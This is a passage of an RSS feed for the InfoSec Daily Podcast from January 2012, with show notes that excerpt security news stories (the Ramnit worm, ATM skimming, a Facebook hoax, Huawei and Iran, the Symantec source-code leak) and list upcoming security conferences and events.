<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The possibly unique sequence of events came to a head when Randy Chaviano, 26, appealed against his 2009 conviction in a Florida court for shooting Charles Acosta during an alleged drug deal.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Appeal Court discovered that almost no records of the trial still existed, the judge the struck down the conviction and ordered a retrial.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bank account-raiding worm has started spreading on Facebook, stealing login credentials as it creeps across the site, security researchers have revealed.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Evidence recovered from a command-and-control server used to coordinate the evolving Ramnit worm confirms that the malware has already stolen 45,000 Facebook passwords and associated email addresses. Experts from Seculert, who found the controller node, have supplied Facebook with a list of all the stolen credentials found on the server. Most of the victims are from either the UK or France.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ramnit differs from other worms, such as Koobface, that have used Facebook to spread because it relies on multiple infection techniques and has only recently extended onto social networks. Koobface, by contrast, only uses Facebook or Twitter to spread.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.cio.com/article/697405/Anatomy_of_an_ATM_Skimmer_Scam"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/697405/Anatomy_of_an_ATM_Skimmer_Scam</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You may already know that its important to protect your financial information when you shop online. But a high-tech threat can steal your credit card information when youre out shopping around town. Scammers can steal your ATM or credit card information without your even noticing, and the technology behind their tricks is getting more and more advanced.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The crime called credit card skimming has become increasingly common in the past few years. In fact, authorities recently uncovered a large, sophisticated skimming operation where scammers attached their devices onto the self-checkout machines at 24 Lucky supermarkets in Northern California. The scam caught hundreds of customers who used the self-checkout machines in October and November 2011 and had their account information stolen.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Obviously, skimmers are a serious security threat. But how exactly do these devices work, and how do you protect yourself from them?</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Insert-Name-Here-Is-Probably-Not-a-Facebook-Hacker-244741.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Insert-Name-Here-Is-Probably-Not-a-Facebook-Hacker-244741.shtml</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Do not accept a friend request from Tanner Dwyer, Christopher Butterfield, Stefania Colac and Alejando Spiljner. These are hackers so put it on your wall. If someone add&#39;s them they take your contacts, empty your computer and addresses, so copy and paste this on your wall,&rdquo; reads the sample provided by Hoax-Slayer, usually in UPPERCASE letters.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The names will change from time to time, but the fact of the matter is that no one can hack a computer just by befriending someone on Facebook.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s true that in the past period cybercriminals began relying of all sorts of malicious strategies to take over Facebook accounts and use them to spread other schemes, but it&rsquo;s a long way from adding a friend to being hacked.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First of all, even if poor Stefania Colac is not a malicious hacker, it&rsquo;s recommended to check out a person before accepting a friendship request. Recent studies revealed that cybercriminals could rely on mutual friends to launch their operations.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Secondly, don&rsquo;t click on links that promise leaked celebrity tapes, free gift cards to McDonald&rsquo;s, iPads, or any other fabulous prizes. If you already fell for such a scam and shared it with your friends, make sure you delete it from your wall.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.infoworld.com/d/the-industry-standard/us-state-department-investigating-huawei-iran-concerns-183258"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/us-state-department-investigating-huawei-iran-concerns-183258</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Department of State said on Wednesday it is investigating Huawei Technologies for allegedly providing censorship and mobile phone tracking technology to Iran, following a request from six U.S. lawmakers.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Department of State &quot;shares the concern of any potential export of technology to Iran that is to be used specifically to disrupt, monitor or suppress communication of the people of Iran,&quot; said department spokeswoman Beth Gosselin in an email.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The allegations arose after The Wall Street Journal published a</span><a href="http://online.wsj.com/article/SB10001424052970204644504576651503577823210.html"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> report</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in October linking Huawei&#39;s export of technology to Iran with the country&#39;s suppression of dissidents using mobile phone tracking technology.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the report, six U.S. lawmakers asked U.S. Secretary of State Hillary Clinton in December</span><a href="http://www.computerworld.com/s/article/9223136/U.S._lawmakers_push_for_Huawei_investigation"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> to investigate</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Huawei for possibly violating U.S. sanctions against Iran. Under the Comprehensive Iran Sanctions Accountability and Divestment Act (</span><a href="http://www.cfr.org/iran/comprehensive-iran-sanctions-accountability-divestment-act-hr-2194/p22484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CISADA</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), passed in 2010, the U.S. government will not enter into contracts with companies that export sensitive technology to the country.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is a complex process and may take some time,&quot; Gosselin said. &quot;If we assess that a company has engaged in the kind of activity sanctionable under CISADA, we will take appropriate action.&quot;</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.securityweek.com/symantec-confirms-hackers-accessed-source-code-two-enterprise-security-products"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/symantec-confirms-hackers-accessed-source-code-two-enterprise-security-products</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec confirmed with SecurityWeek early Friday morning that the products in question are Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2, so this incident did NOT involve its consumer products which are &ldquo;Norton&rdquo; branded.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While many would expect the &ldquo;FUD&rdquo; factor to kick in, its important to realize a few facts. Symantec updates its products on a &ldquo;.1 basis&rdquo;, and its Endpoint Protection product is now at version 12.0 and 12.1. According to a Symantec spokesperson, &ldquo;SEP 11 was four years ago to be exact.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, Symantec Antivirus 10.2 has been discontinued, though the company continues to service it.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We&rsquo;re taking this extremely seriously and are erring on the side of caution to develop and long-range plan to take care of customers still using those products,&rdquo; Cris Paden, Senior Manager of Corporate Communications at Symantec told SecurityWeek.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s also important to bear in mind that this is not a virus or false positive. The products are not broken. They perform just fine and work just fine.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unlike the RSA breach when hackers penetrated company networks to steal confidential data and intellectual property, Symantec confirmed that its systems had not been breached. </span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Symantec&rsquo;s own network was not breached, but rather that of a third party entity,&rdquo; the company said in a statement.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacker group assumed to be responsible is operating under the name Dharmaraja, and claims it found the data after compromising Indian military intelligence servers.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3341/0/infosec-daily-podcast-episode-561.mp3" length="29959877" type="audio/mpeg" />
		<itunes:duration>1:02:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax, VA
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/
A convicted murderer has been granted a retrial after a stenographer&#8217;s backup record of his trial was apparently destroyed by a malware infection.
	The possibly unique sequence of events came to a head when Randy Chaviano, 26, appealed against his 2009 conviction in a Florida court for shooting Charles Acosta during an alleged drug deal.
	When the Appeal Court discovered that almost no records[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 560 &#8211; An evening with Rob Fuller (@mubix)</title>
		<link>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix</link>
		<comments>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix#comments</comments>
		<pubDate>Fri, 06 Jan 2012 01:51:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3338</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 560 for January 5, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NOVA Hackers Open House</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 9th, 2012 at 6:00PM</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ICF International, 9300 Lee Highway, Fairfax</span><br />
	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
